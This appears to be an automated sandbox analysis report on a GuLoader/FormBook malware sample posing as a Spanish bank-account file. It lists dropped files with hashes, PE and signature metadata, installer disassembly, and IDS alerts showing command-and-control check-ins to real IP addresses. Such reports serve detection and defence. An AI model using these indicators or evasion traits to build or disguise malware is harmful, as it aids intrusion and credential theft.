	rResegregation.exe	Get hash	malicious	GuLoader	Browse
	W1nnerFree CS2.exe	Get hash	malicious	LoaderBot, Xmrig	Browse
	WP.exe	Get hash	malicious	Unknown	Browse
	HICAPSConnect_4.0.0.1.exe	Get hash	malicious	Unknown	Browse
	TIjRtMJfZA.exe	Get hash	malicious	Remcos, GuLoader	Browse
	TIjRtMJfZA.exe	Get hash	malicious	GuLoader	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Temp\-49-u729

Download File

Process:	C:\Windows\SysWOW64\rasautou.exe
File Type:	SQLite 3.x database, last written using SQLite version 3036000, page size 2048, file counter 7, database pages 59, cookie 0x52, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	122880
Entropy (8bit):	1.1414673161713362
Encrypted:	false
SSDEEP:	192:8t4nKTjebGA7j9p/XH9eQ3KvphCNKRmquPWTPVusE6:8t4n/9p/39J6hwNKRmqu+7VusE
MD5:	24937DB267D854F3EF5453E2E54EA21B
SHA1:	F519A77A669D9F706D5D537A203B7245368D40CE
SHA-256:	369B8B4465FB5FD7F12258C7DEA941F9CCA9A90C78EE195DF5E02028686869ED
SHA-512:	AED398C6781300E732105E541A6FDD762F04E0EC5A5893762BFDCBDD442348FAF9CB2711EFDC4808D4675A8E48F77BEAB3A0D6BC635B778D47B2DADC9B6086A3
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	SQLite format 3......@ .......;...........R......................................................S`...........5........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\bandidos\Clearingkontoen\skrivetjet\Disenthralls\Ethnogenist82\merrill.txt

Download File

Process:	C:\Users\user\Desktop\cuenta iban-ES65.exe
File Type:	ASCII text, with very long lines (342), with CRLF line terminators
Category:	dropped
Size (bytes):	409
Entropy (8bit):	4.316596138966152
Encrypted:	false
SSDEEP:	12:uILfzwCbnN4VsFdzvO/cWJV9Cu/LkozsjsGgCu6:jLEkLR4VmozqngCu6
MD5:	37FADD78CA1A16ACBA1C7C6E63B41790
SHA1:	86D7AC5B3B31FD34C742F97314774C3A8278C5C7
SHA-256:	4938F4211BF8BBA63BBA27B4A2490731AB3E56BC39C4B0997AE27148CB0B10EA
SHA-512:	064537F2C3C471B4439141CBBAB01F3D7423C51DBCCD51C848612857E4532156EC037E4F2AA76A5D5C16D62EBB51C2C63A5614DD323F4639A9084C1CE9BE8092
Malicious:	false
Reputation:	low
Preview:	vankelmodig egernsund topectomy.tamanaca middlemost phellogen vandskadens soelvskrin plumbaginaceous unpartiality,coddled ableeze gerodermia rvrdiges sukkerlager kvarter.abdullahs kahili producent glike statsfinanserne.selskabsdamers topprisers desegmented tumors dominations paakaldt majkattens brickset drberceller waterboard staaltraadsnet..milliares sydsol exoner surgicotherapy recodifying myggesvrmene..

C:\Users\user\AppData\Local\Temp\bandidos\Clearingkontoen\skrivetjet\Disenthralls\Ethnogenist82\mf.fys

Download File

Process:	C:\Users\user\Desktop\cuenta iban-ES65.exe
File Type:	data
Category:	dropped
Size (bytes):	197401
Entropy (8bit):	4.943394286855981
Encrypted:	false
SSDEEP:	3072:bkRORodlog6aK0ph0cXf2s/X8BT2vHWt8HSJrUBT0Bg5yLbbubc+OGjK3Eqm:b9oIg6qh02+suT2e5rxgs36HOGjKUqm
MD5:	92741A228B38BD3240CB74D7337AB2B2
SHA1:	56A25F8CB6DF0EBD46F8423B41132D6826EE67E7
SHA-256:	FF913C2B04E11520A2D153E25C305E72984A33CAD0649CF94FC9498862916B2C
SHA-512:	0AD99DAD1D5486B23C425687EFF0902A6F5D8447CC9FB6F03B01AA7AF3F931C4B8E5963D4ABBB9FEDDA5C5809C8E615CE3A93A4132427EAE85912CCDB7491267
Malicious:	false
Reputation:	low
Preview:	...c.I..md......i....]........1.,o.d;...L.....#...N...T...}..........a..h.......&.D..........M.]i.T..^p....G.......q.......................S.....}....."".;...-.......Y....Z....y..6.\|.'..4P...............Y?.(j..b.a....0T.....s....a+....#.......h........EN.U..8..........z.........R..Y)...h........xo...........~.....7....o............o.VuG..W.P\.........C.d.3..........jv..qq.?.!......................u.....6_....... .............m......../...af.......0......{.j.$.....^.g...........#............H...........0..'..p;..................7.......h...\.4n..........<.n...?........u......\|J.g.L....}g.......K.......p.........y..........AT....LF........+fc...'z....._............q.y...........]b...*...c...............}....&...$................r...................P..........>....<............q.)..........o............^..........x....?...&~.........................@..E..q......z......EC;J.5......a.p.i........@...........4!.......V.......j..<.I.......qX......e..A.C........V.....................

C:\Users\user\AppData\Local\Temp\bandidos\Clearingkontoen\skrivetjet\Disenthralls\Ethnogenist82\unpopularised.fas

Download File

Process:	C:\Users\user\Desktop\cuenta iban-ES65.exe
File Type:	data
Category:	dropped
Size (bytes):	177692
Entropy (8bit):	4.929126718267887
Encrypted:	false
SSDEEP:	3072:/skvPxa7Rsl3OWreA7lX6/pKJ4Vo/pgUkiCF2nO9I3I5csbyU3e:/skv07Rm35fJEoBLd9O9fcsbTO
MD5:	9A7DED13A5C6C7444E8C563C0621D5BC
SHA1:	8698D3FC40852CC4CDAB3FE885225671895A94FA
SHA-256:	D3EABF84D1FFA658F1ACF8E61875B210839C3242AC5478FECE8E910BC979BB64
SHA-512:	91511DDF50C2E523BCA064793338A47CC3AFBEDE69274CB5F34F5195E81D416C23CC22686FC5AE63A2159ED577B3F5CC127C5CB918E5CFB63D378B2BF9E38E56
Malicious:	false
Preview:	...R. ...................Y....xB....7..=...........L..k..?....h.......[......................^......5......................H......$.....4p.-_V.....}.Pt..H.Z.............}...g....2.....Mo_.......^.....EJ.B...1....................K..t2..6..X....................9..........-...........t...M..f.........!.........x.u...~...-.2..tr..........\............X... ..........W..Y.....w.......1......d............#.......?....;........:......+../.y....%...m.....H......{.........................<...............................3 ...@.....#...........\.....&..............n...J.N...4-... ........N.....y..g..........................-3.[...................!.........?y.V.q..k....B.........`(.4.........G6.....5...........:........*......................v.f....e.A..........y......m....7....T...&..&...z.=...(.......!....z...,.c....F......E................w..........u,....;.p.............zn.....(.....]...~..........M[..2..B.....I.a..8....]Y........P..<....x.,....../...........>....E...S...C.q..

C:\Users\user\AppData\Local\Temp\bandidos\Clearingkontoen\skrivetjet\Exceptionalally\Insecure\Thorkilds.Jus

Download File

Process:	C:\Users\user\Desktop\cuenta iban-ES65.exe
File Type:	Matlab v4 mat-file (little endian) , numeric, rows 0, columns 0, imaginary
Category:	dropped
Size (bytes):	276122
Entropy (8bit):	7.701795670262245
Encrypted:	false
SSDEEP:	3072:PyGUq/gsmNrXzbn5fqnwHUqp2w7exJonqkEsIPon9hDPdOM0nUD3aamYGjIRqMwE:qtqYpNzxqw0aePonbDLbL3ukl7zwV4Tz
MD5:	97388F1016F9B4275E30E8035A963940
SHA1:	E7276FC8B4F4F4298F4ABAE896B4C436E58F9B81
SHA-256:	7A60A1A9EF5E75C1B0718C4EBD522A1EACD1C8747A8CD73443B936AC7729BBCB
SHA-512:	5D565DDE6CCDE710CF289FEE4A0FA0BAC1E8F278DEF6B07B6A0C029BA116C347C690F094DE8BD3C43C9B35D2D8F97E87D13E6B37072D9EDE6C44DFE8F5CEF8BC
Malicious:	false
Preview:	...............U........HH.%..............>.................{.OO..........X.....i.;.../...................7.<.C.....................................................f....1...i\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\.......6.9h6VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV..%U........caw4.%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%......M...%jjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjj......._..^*???????????????????????????????????????????????????????????????????????????????????????????.....X.....}9..}.........................................................................................................................4......u%n.Ygggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggf.........x..E.......................................................................................................................0...f....s..@<.0"######

C:\Users\user\AppData\Local\Temp\bandidos\Clearingkontoen\skrivetjet\Exceptionalally\Insecure\heiling.rep

Download File

Process:	C:\Users\user\Desktop\cuenta iban-ES65.exe
File Type:	data
Category:	dropped
Size (bytes):	144434
Entropy (8bit):	4.930322413705722
Encrypted:	false
SSDEEP:	3072:7W6ttdRhkvhbiQ+6LxUwih5Nd9PAhUekxpRkDFm8:5h+hf+6G3Nje2pIm8
MD5:	6E6697CCC2A5B888E8D13D4BD3027FA6
SHA1:	6BF4017D1016825F65A2001982DA632CCEBE8595
SHA-256:	6DC937B66FF9E32AD262C966081BF7A1AA38A759491BE863E7AE2E28CC5DA611
SHA-512:	6540116A7E70F21FE601A7E69DF7EF491678C853B7163CC265E74D1D02791EA8091BE467B33892F157B33DFC136D6CE9D8D982BF040DB54452127E40A37505F5
Malicious:	false
Preview:	F.L.........k..B.=.........9........r...8..CF.........X....4I.......x.................U...........!......F...g....... ...$......n...r.....fz..\.l........Q......v.+.)..?..5...t../g.......U^9..&.Y......wS{.......V...;d.........{ -......_.J.......J.......,...w.....#.C.......>.Tn................'......Z...s....v........f......n..1...9uV...\+..W....N..~...@GI......].KU/.4RS...P...`......!.x.......9........Gh........%p......w.1. ..`.E\r..i................o..L..z'..........Y......rK..<.......crq$..........\...I............t.....g...6J.r.Q.{.K............U.)...~.. ........j..D$...>...........\|........a......w...q............2`......W....%hC.=z[...q......f.a.%....w...$.......;..O..............\|..a........ ....l......0......E\|...??......j.)S...............~..-.....h........$.L........v....................z........../.....................+..-...8#...................................IA...............[.................3..~....t.........H...u..... C.......V.....k......l.......tK.T^...

C:\Users\user\AppData\Local\Temp\bandidos\Clearingkontoen\skrivetjet\Nonimporting.Roy

Download File

Process:	C:\Users\user\Desktop\cuenta iban-ES65.exe
File Type:	data
Category:	dropped
Size (bytes):	145754
Entropy (8bit):	4.601517571645783
Encrypted:	false
SSDEEP:	1536:WnORYVM9r+94u4zdqGmb1lQp8Nnk++nzQ7ZqPWh70V6Z38UE6iuDKx:WnO35Q4uUYxP+zQ7Zq+816iuC
MD5:	BAF512921F523FB8FDA6FF9DAB021BF9
SHA1:	DCBB0D1F22A1A5676E419BD168B849232AC8D317
SHA-256:	A8328295A9DB6A60923681B8B295A7FBA62369B8A8657B088CC5758CBFABA2AB
SHA-512:	6C544AD1ECF3692E8B3172BD57DE2B24924A7EABC7EB62CD44A68AE4C936378FAE165D4B4BA29E13295DC2F5980D14EA478F6DD7D0348446855DC95526C67F99
Malicious:	false
Preview:	...........AA......n...........KK...................c..""..=.................._.HH..%................+++..........w...:..................L.......................TTT.....i.\|..~....................................K.........................111.b..................zz.....>.44444......................R.........S......................... ...q............yyyyy..............&&.............}......................."...........w.4..55.......LL.".............................Y..............ZZ........LLLLLL..11.-...........L........!!.......................................B......000000.....gg.............MMMMMM.................................................................II......).....I........s..........:.v................f....rr....g.<<......NN......dddd.................E......SS.RRR...H.aa..............{......yy....QQ......444...................LL...........................e............................((...zz....III...C...9....11.............I............UU.............uuuuuuu..............u..

C:\Users\user\AppData\Local\Temp\nsn876E.tmp\System.dll

Download File

Process:	C:\Users\user\Desktop\cuenta iban-ES65.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	11264
Entropy (8bit):	5.770803561213006
Encrypted:	false
SSDEEP:	192:vPtkumJX7zB22kGwfy0mtVgkCPOsE1un:k702k5qpdsEQn
MD5:	2AE993A2FFEC0C137EB51C8832691BCB
SHA1:	98E0B37B7C14890F8A599F35678AF5E9435906E1
SHA-256:	681382F3134DE5C6272A49DD13651C8C201B89C247B471191496E7335702FA59
SHA-512:	2501371EB09C01746119305BA080F3B8C41E64535FF09CEE4F51322530366D0BD5322EA5290A466356598027E6CDA8AB360CAEF62DCAF560D630742E2DD9BCD9
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: cuenta iban-ES65.exe, Detection: malicious, Browse Filename: cuenta iban-ES65.exe, Detection: malicious, Browse Filename: rResegregation.exe, Detection: malicious, Browse Filename: rResegregation.exe, Detection: malicious, Browse Filename: W1nnerFree CS2.exe, Detection: malicious, Browse Filename: WP.exe, Detection: malicious, Browse Filename: HICAPSConnect_4.0.0.1.exe, Detection: malicious, Browse Filename: TIjRtMJfZA.exe, Detection: malicious, Browse Filename: TIjRtMJfZA.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......)...m.m.m...k.m.~....j.9..i....l....l.Richm.........................PE..L...tc.W...........!.................'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text...O........................... ..`.rdata..S....0......."..............@..@.data...h....@.......&..............@....reloc..`....P.......(..............@..B................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsn876E.tmp\nsExec.dll

Download File

Process:	C:\Users\user\Desktop\cuenta iban-ES65.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	6656
Entropy (8bit):	4.994861218233575
Encrypted:	false
SSDEEP:	96:U7GUxNkO6GR0t9GKKr1Zd8NHYVVHp4dEeY3kRnHdMqqyVgNN3e:mXhHR0aTQN4gRHdMqJVgNE
MD5:	B648C78981C02C434D6A04D4422A6198
SHA1:	74D99EED1EAE76C7F43454C01CDB7030E5772FC2
SHA-256:	3E3D516D4F28948A474704D5DC9907DBE39E3B3F98E7299F536337278C59C5C9
SHA-512:	219C88C0EF9FD6E3BE34C56D8458443E695BADD27861D74C486143306A94B8318E6593BF4DA81421E88E4539B238557DD4FE1F5BEDF3ECEC59727917099E90D2
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: cuenta iban-ES65.exe, Detection: malicious, Browse Filename: cuenta iban-ES65.exe, Detection: malicious, Browse Filename: rResegregation.exe, Detection: malicious, Browse Filename: rResegregation.exe, Detection: malicious, Browse Filename: INNORIX-Agent.exe, Detection: malicious, Browse Filename: INNORIX-Agent.exe, Detection: malicious, Browse Filename: HICAPSConnect_4.0.0.1.exe, Detection: malicious, Browse Filename: bPYR660y5o.exe, Detection: malicious, Browse Filename: uQP25xP5DH.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........d..7..7..7..7..7,..7..7..7..7..7..7Rich..7........PE..L...rc.W...........!......................... ...............................P.......................................$..l.... ..P............................@....................................................... ...............................text............................... ..`.rdata..,.... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\hotdoggen.ini

Download File

Process:	C:\Users\user\Desktop\cuenta iban-ES65.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	50
Entropy (8bit):	4.351272380112911
Encrypted:	false
SSDEEP:	3:Y0e4nxwKOAXXXUT23:ZxGQUTg
MD5:	70345464BA62A9453DB2F24C1BC10881
SHA1:	62FE4814D1B6082B46C196734B9EAF33B9B691BB
SHA-256:	CC7E912D757A17A09CED10401C69D122B7972D4F9F6E26705E18A8CFE3EBEF40
SHA-512:	B0ED1640898EBF66797489862BE3ACDFF589B161106C688E0536CABD91F673A75126A70B9363B078D8C88144D547DED4E8980E457C8E75E1477AADBB5414AE3A
Malicious:	false
Preview:	[flgevirkningerne]..Blokeringsfrit250=Svaleskabs..

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.670262437037489
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	cuenta iban-ES65.exe
File size:	906'344 bytes
MD5:	5879a124cd6d7bfbf0133e005f1bdebd
SHA1:	3f96bd536b078f321322e52c0a2aa53b2139664e
SHA256:	f6580f6a21a712e87c8d55662adf7d87df24253976085675014f246cccf8fdaf
SHA512:	97c7debb000d21524ff9775177863fdd945ce1c90c654e671df0afa540b6bfe2c871109e897e0519c0b7094bd4cfaad29e1666b5da83bafa37adbc994dc5fe10
SSDEEP:	12288:jJTQrh2guL2ObOOSbH6ROfuhheB0E1QtlKnXUJW+QiAukU30+9Ir/CSQs:tTQrh2gu/9SbAOI4qiqyUk+T/G/Ca
TLSH:	F41512076E85DD13C69356748DE1E77BA33CCE800E2986476BC03E5ABD72B9E2A4509C
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........@............/...........s.../...............+.......Rich............................PE..L....c.W.................^....9....

File Icon


Icon Hash:	4dcdeced7d5d5823

Static PE Info

General

Entrypoint:	0x4030ec
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x5795637F [Mon Jul 25 00:55:27 2016 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	b78ecf47c0a3e24a6f4af114e2d1f5de

Authenticode Signature

Signature Valid:	false
Signature Issuer:	E=Mlketands@Bickerers.Pr, O=Medievalisms, OU="Perennialise Hankerer ", CN=Medievalisms, L=St Blazey, S=England, C=GB
Signature Validation Error:	A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
Error Number:	-2146762487
Not Before, Not After	13/12/2023 11:50:47 12/12/2026 11:50:47
Subject Chain	E=Mlketands@Bickerers.Pr, O=Medievalisms, OU="Perennialise Hankerer ", CN=Medievalisms, L=St Blazey, S=England, C=GB
Version:	3
Thumbprint MD5:	5C65AF1D30CFF1320466A59477CB4D26
Thumbprint SHA-1:	BA9B2813158E944DA6AA02C60E6C3E71A82B924D
Thumbprint SHA-256:	C3DF5060943BB19503DBCB700BE7C2C3A63981963A97449E269FD6CA70294960
Serial:	632E2A1F099E309B38AB75727BE93ABA5700976D

Entrypoint Preview

Instruction
sub esp, 00000184h
push ebx
push esi
push edi
xor ebx, ebx
push 00008001h
mov dword ptr [esp+18h], ebx
mov dword ptr [esp+10h], 00409198h
mov dword ptr [esp+20h], ebx
mov byte ptr [esp+14h], 00000020h
call dword ptr [004070A8h]
call dword ptr [004070A4h]
cmp ax, 00000006h
je 00007F2B48574C93h
push ebx
call 00007F2B48577C01h
cmp eax, ebx
je 00007F2B48574C89h
push 00000C00h
call eax
mov esi, 00407298h
push esi
call 00007F2B48577B7Dh
push esi
call dword ptr [004070A0h]
lea esi, dword ptr [esi+eax+01h]
cmp byte ptr [esi], bl
jne 00007F2B48574C6Dh
push ebp
push 00000009h
call 00007F2B48577BD4h
push 00000007h
call 00007F2B48577BCDh
mov dword ptr [007A1F44h], eax
call dword ptr [00407044h]
push ebx
call dword ptr [00407288h]
mov dword ptr [007A1FF8h], eax
push ebx
lea eax, dword ptr [esp+38h]
push 00000160h
push eax
push ebx
push 0079D500h
call dword ptr [00407174h]
push 00409188h
push 007A1740h
call 00007F2B485777F7h
call dword ptr [0040709Ch]
mov ebp, 007A8000h
push eax
push ebp
call 00007F2B485777E5h
push ebx
call dword ptr [00407154h]

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x7428	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x3c0000	0x2b038	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0xdb980	0x1ae8	.data
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x7000	0x298	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x5db6	0x5e00	f367801e476b699be2b532039e0b583c	False	0.6806848404255319	data	6.508470969322742	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x7000	0x1246	0x1400	43fab6a80651bd97af8f34ecf44cd8ac	False	0.42734375	data	5.005029341587408	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x9000	0x399038	0x400	29ebcbec0bd7bd0fecb3d2937195c560	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x3a3000	0x1d000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x3c0000	0x2b038	0x2b200	9778d093a419153a5e6a05c46a1f4faa	False	0.38580729166666666	data	4.808486494968782	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x3c0448	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 67584	English	United States	0.3347480184549864
RT_ICON	0x3d0c70	0x94a8	Device independent bitmap graphic, 96 x 192 x 32, image size 38016	English	United States	0.4008040782005466
RT_ICON	0x3da118	0x5488	Device independent bitmap graphic, 72 x 144 x 32, image size 21600	English	United States	0.41899260628465806
RT_ICON	0x3df5a0	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16896	English	United States	0.40257439773264053
RT_ICON	0x3e37c8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.45643153526970953
RT_ICON	0x3e5d70	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.4978893058161351
RT_ICON	0x3e6e18	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2688	English	United States	0.5407782515991472
RT_ICON	0x3e7cc0	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	English	United States	0.5545081967213115
RT_ICON	0x3e8648	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1152	English	United States	0.5424187725631769
RT_ICON	0x3e8ef0	0x748	Device independent bitmap graphic, 24 x 48 x 24, image size 1824	English	United States	0.5359442060085837
RT_ICON	0x3e9638	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 672	English	United States	0.4925115207373272
RT_ICON	0x3e9d00	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 320	English	United States	0.3627167630057804
RT_ICON	0x3ea268	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.598404255319149
RT_DIALOG	0x3ea6d0	0x100	data	English	United States	0.5234375
RT_DIALOG	0x3ea7d0	0x11c	data	English	United States	0.6056338028169014
RT_DIALOG	0x3ea8f0	0xc4	data	English	United States	0.5918367346938775
RT_DIALOG	0x3ea9b8	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x3eaa18	0xbc	data	English	United States	0.648936170212766
RT_VERSION	0x3eaad8	0x21c	data	English	United States	0.5203703703703704
RT_MANIFEST	0x3eacf8	0x33d	XML 1.0 document, ASCII text, with very long lines (829), with no line terminators	English	United States	0.5536791314837153

Imports

DLL	Import
KERNEL32.dll	SetEnvironmentVariableA, Sleep, GetTickCount, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, GetFileAttributesA, SetFileAttributesA, GetWindowsDirectoryA, GetTempPathA, GetCommandLineA, lstrlenA, GetVersion, SetErrorMode, lstrcpynA, ExitProcess, GetFullPathNameA, GlobalLock, CreateThread, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, ReadFile, WriteFile, lstrcpyA, MoveFileExA, lstrcatA, GetSystemDirectoryA, GetProcAddress, CloseHandle, SetCurrentDirectoryA, MoveFileA, CompareFileTime, GetShortPathNameA, SearchPathA, lstrcmpiA, SetFileTime, lstrcmpA, ExpandEnvironmentStringsA, GlobalUnlock, GetDiskFreeSpaceA, GlobalFree, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, GetPrivateProfileStringA, FindClose, MultiByteToWideChar, FreeLibrary, MulDiv, WritePrivateProfileStringA, LoadLibraryExA, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, GlobalAlloc
USER32.dll	ScreenToClient, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, PostQuitMessage, GetWindowRect, EnableMenuItem, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndDialog, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, GetDC, CreateDialogParamA, SetTimer, GetDlgItem, SetWindowLongA, SetForegroundWindow, LoadImageA, IsWindow, SendMessageTimeoutA, FindWindowExA, OpenClipboard, TrackPopupMenu, AppendMenuA, EndPaint, DestroyWindow, wsprintfA, ShowWindow, SetWindowTextA
GDI32.dll	SelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll	SHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA
ADVAPI32.dll	RegDeleteKeyA, SetFileSecurityA, OpenProcessToken, LookupPrivilegeValueA, AdjustTokenPrivileges, RegOpenKeyExA, RegEnumValueA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
COMCTL32.dll	ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll	OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
02/28/24-15:47:24.168030	TCP	2855464	ETPRO TROJAN FormBook CnC Checkin (POST) M3	50265	80	192.168.11.20	109.234.166.81
02/28/24-15:51:08.620886	TCP	2855464	ETPRO TROJAN FormBook CnC Checkin (POST) M3	50290	80	192.168.11.20	91.195.240.19
02/28/24-15:46:09.173431	TCP	2855464	ETPRO TROJAN FormBook CnC Checkin (POST) M3	50245	80	192.168.11.20	194.191.24.38
02/28/24-15:47:15.087986	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	50263	80	192.168.11.20	103.146.179.172
02/28/24-15:47:06.561791	TCP	2855464	ETPRO TROJAN FormBook CnC Checkin (POST) M3	50260	80	192.168.11.20	103.146.179.172
02/28/24-15:45:12.014874	TCP	2855464	ETPRO TROJAN FormBook CnC Checkin (POST) M3	50232	80	192.168.11.20	82.180.172.14
02/28/24-15:50:28.113737	TCP	2855464	ETPRO TROJAN FormBook CnC Checkin (POST) M3	50281	80	192.168.11.20	198.54.117.242
02/28/24-15:45:38.820397	TCP	2855464	ETPRO TROJAN FormBook CnC Checkin (POST) M3	50240	80	192.168.11.20	198.177.123.106
02/28/24-15:50:01.236638	TCP	2855464	ETPRO TROJAN FormBook CnC Checkin (POST) M3	50272	80	192.168.11.20	172.67.130.3
02/28/24-15:47:09.411895	TCP	2855464	ETPRO TROJAN FormBook CnC Checkin (POST) M3	50261	80	192.168.11.20	103.146.179.172
02/28/24-15:46:26.784462	TCP	2855464	ETPRO TROJAN FormBook CnC Checkin (POST) M3	50250	80	192.168.11.20	84.32.84.32
02/28/24-15:45:17.388811	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	50235	80	192.168.11.20	82.180.172.14
02/28/24-15:50:36.382797	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	50284	80	192.168.11.20	198.54.117.242
02/28/24-15:50:45.345083	TCP	2855464	ETPRO TROJAN FormBook CnC Checkin (POST) M3	50286	80	192.168.11.20	198.177.123.106
02/28/24-15:45:25.858243	TCP	2855464	ETPRO TROJAN FormBook CnC Checkin (POST) M3	50237	80	192.168.11.20	198.54.117.242
